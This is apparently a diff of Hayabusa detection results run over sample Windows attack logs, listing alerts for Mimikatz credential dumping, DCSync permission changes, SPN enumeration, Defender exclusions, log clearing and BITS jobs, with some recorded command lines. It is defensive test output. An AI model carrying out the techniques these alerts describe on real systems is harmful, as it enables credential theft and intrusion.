+2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D  :  Severity: High  :  Type: Tool  :  User: OFFSEC\admmig  :  Path: file:_C:\Users\admmig\Documents\mimikatz.exe  :  Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win64/Mikatz!dha  :  Severity: High  :  Type: Tool  :  User: OFFSEC\admmig  :  Path: file:_C:\Users\admmig\Documents\mimidrv.sys; file:_C:\Users\admmig\Documents\mimilib.dll  :  Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D  :  Severity: High  :  Type: Tool  :  User: OFFSEC\admmig  :  Path: file:_C:\Users\admmig\Documents\mimikatz.exe  :  Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:44.271 +09:00,WIN10-client01.offsec.lan,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:44.271 +09:00,WIN10-client01.offsec.lan,1117,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:44.271 +09:00,WIN10-client01.offsec.lan,1117,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D  :  Severity: High  :  Type: Tool  :  User: OFFSEC\admmig  :  Path: file:_C:\Users\admmig\Documents\mimikatz.exe  :  Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx
+2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx
+2020-12-16 17:44:06.473 +09:00,WIN10-client01.offsec.lan,5007,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx
+2020-12-16 17:44:06.473 +09:00,WIN10-client01.offsec.lan,5007,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx
+2020-12-16 17:44:27.222 +09:00,WIN10-client01.offsec.lan,5007,medium,Windows Defender Exclusions Added,,rules/sigma/other/windefend/win_defender_exclusions.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx
+2020-12-16 17:44:27.222 +09:00,WIN10-client01.offsec.lan,5007,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx
+2020-12-16 17:44:27.222 +09:00,WIN10-client01.offsec.lan,5007,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx
+2020-12-16 17:44:51.331 +09:00,WIN10-client01.offsec.lan,5007,medium,Windows Defender Exclusions Added,,rules/sigma/other/windefend/win_defender_exclusions.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx
+2020-12-16 17:45:04.144 +09:00,WIN10-client01.offsec.lan,5007,medium,Windows Defender Exclusions Added,,rules/sigma/other/windefend/win_defender_exclusions.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx
+2021-01-26 22:21:13.690 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false  :  Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe"" ""C:\Users\bouss\source\repos\blabla\blabla.sln""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:13.690 +09:00,LAPTOP-JU4M3I0E,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:13.978 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\windows\system32\cmd.exe""  /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd  :  Path: C:\Windows\SysWOW64\cmd.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:14.023 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: powershell.exe   start-process notepad.exe  :  Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: ""C:\windows\system32\cmd.exe""  /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:14.023 +09:00,LAPTOP-JU4M3I0E,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:14.296 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\windows\system32\notepad.exe""   :  Path: C:\Windows\SysWOW64\notepad.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: powershell.exe   start-process notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:14.428 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp"" /c ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe""  @""C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp""  :  Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:14.456 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp  :  Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\Hostx86\x86\cl.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp"" /c ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe""  @""C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:14.667 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\VCTIP.EXE""  :  Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\Hostx86\x86\vctip.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-02-01 20:13:11.195 +09:00,fs02.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1015,technique_name=Accessibility Features  :  Command: setspn  -T offsec -Q */*  :  Path: C:\Windows\System32\setspn.exe  :  User: OFFSEC\admmig  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID1-SPN discovery (SYSMON process).evtx
+2021-02-01 20:13:11.195 +09:00,fs02.offsec.lan,1,medium,Possible SPN Enumeration,,rules/sigma/process_creation/win_spn_enum.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID1-SPN discovery (SYSMON process).evtx
+2021-02-03 00:37:59.991 +09:00,fs02.offsec.lan,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-Time changed.evtx
+2021-02-03 00:37:59.993 +09:00,fs02.offsec.lan,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-Time changed.evtx
+2021-02-03 00:38:31.989 +09:00,fs02.offsec.lan,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-Time changed.evtx
+2021-02-03 00:38:31.995 +09:00,fs02.offsec.lan,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-Time changed.evtx
+2021-02-08 21:03:02.776 +09:00,rootdc1.offsec.lan,4738,high,Weak Encryption Enabled and Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-User set with reversible psw encryption.evtx
+2021-02-08 21:06:15.608 +09:00,rootdc1.offsec.lan,4738,high,Weak Encryption Enabled and Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-Use only Kerberos DES encryption types.evtx
+2021-02-08 21:06:53.407 +09:00,rootdc1.offsec.lan,4738,high,Weak Encryption Enabled and Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-Do not require Kerberos preauthentication.evtx
+2021-02-23 07:18:08.605 +09:00,rootdc1.offsec.lan,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5136-Permission change on top root AD (DCsync).evtx
+2021-02-23 07:18:08.605 +09:00,rootdc1.offsec.lan,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5136-Permission change on top root AD (DCsync).evtx
+2021-02-23 07:35:11.993 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID5136-4662 AD object owner changed.evtx
+2021-02-23 07:35:20.786 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID5136-4662 AD object owner changed.evtx
+2021-02-23 08:07:21.231 +09:00,jump01.offsec.lan,59,informational,Bits Job Creation,Job Title: hackingarticles  :  URL: https://www.ma-neobanque.com/wp-content/uploads/2020/11/carte-max-premium.jpg,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID3-59-60-BITS job created.evtx
+2021-03-16 03:49:21.017 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download  :  URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2021-03-16 03:49:23.184 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: ab170ec9.png  :  URL: https://i.imgur.com/IFpvPlt.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2021-03-16 03:52:31.347 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1eBRSG.img?w=100&h=100&m=6&tilesize=medium&x=1788&y=885&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2021-03-16 03:52:33.804 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2021-03-16 03:53:18.009 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2021-03-16 03:53:51.796 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1eC0p1.img?w=100&h=100&m=6&tilesize=medium&x=1964&y=1240&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2021-03-16 03:53:52.751 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2021-03-16 03:54:15.647 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: efc1a28b.png  :  URL: https://i.imgur.com/IFpvPlt.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2021-03-16 03:55:38.049 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{259DDBBE-DDD3-4590-8A2C-60211631093C}-GoogleUpdateSetup.exe  :  URL: http://r5---sn-5hnedn7l.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe?cms_redirect=yes&mh=pH&mip=213.127.64.248&mm=28&mn=sn-5hnedn7l&ms=nvh&mt=1615834104&mv=m&mvi=5&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2021-03-16 04:01:32.985 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{F1502BD5-ADFF-4123-9C07-0E4B02FCB037}-89.0.4389.82_87.0.4280.66_chrome_updater.exe  :  URL: http://r1---sn-5hne6nlr.gvt1.com/edgedl/release2/chrome/AKGnpidu3x0C0gtuxw-XHRQ_89.0.4389.82/89.0.4389.82_87.0.4280.66_chrome_updater.exe?cms_redirect=yes&mh=rx&mip=213.127.64.248&mm=28&mn=sn-5hne6nlr&ms=nvh&mt=1615834584&mv=m&mvi=1&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
+2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
+2021-03-27 01:12:22.201 +09:00,jump01.offsec.lan,13,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID13-New service for Mimikatz.evtx
+2021-03-27 01:12:22.201 +09:00,jump01.offsec.lan,13,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID13-New service for Mimikatz.evtx
+2021-03-27 01:17:29.210 +09:00,jump01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx
+2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
+2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
+2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx
+2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx
+2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,high,Credential Dumping Tools Service Execution,,rules/sigma/builtin/security/win_security_mal_creddumper.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx
+2021-03-27 01:36:00.106 +09:00,jump01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
+2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4658,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
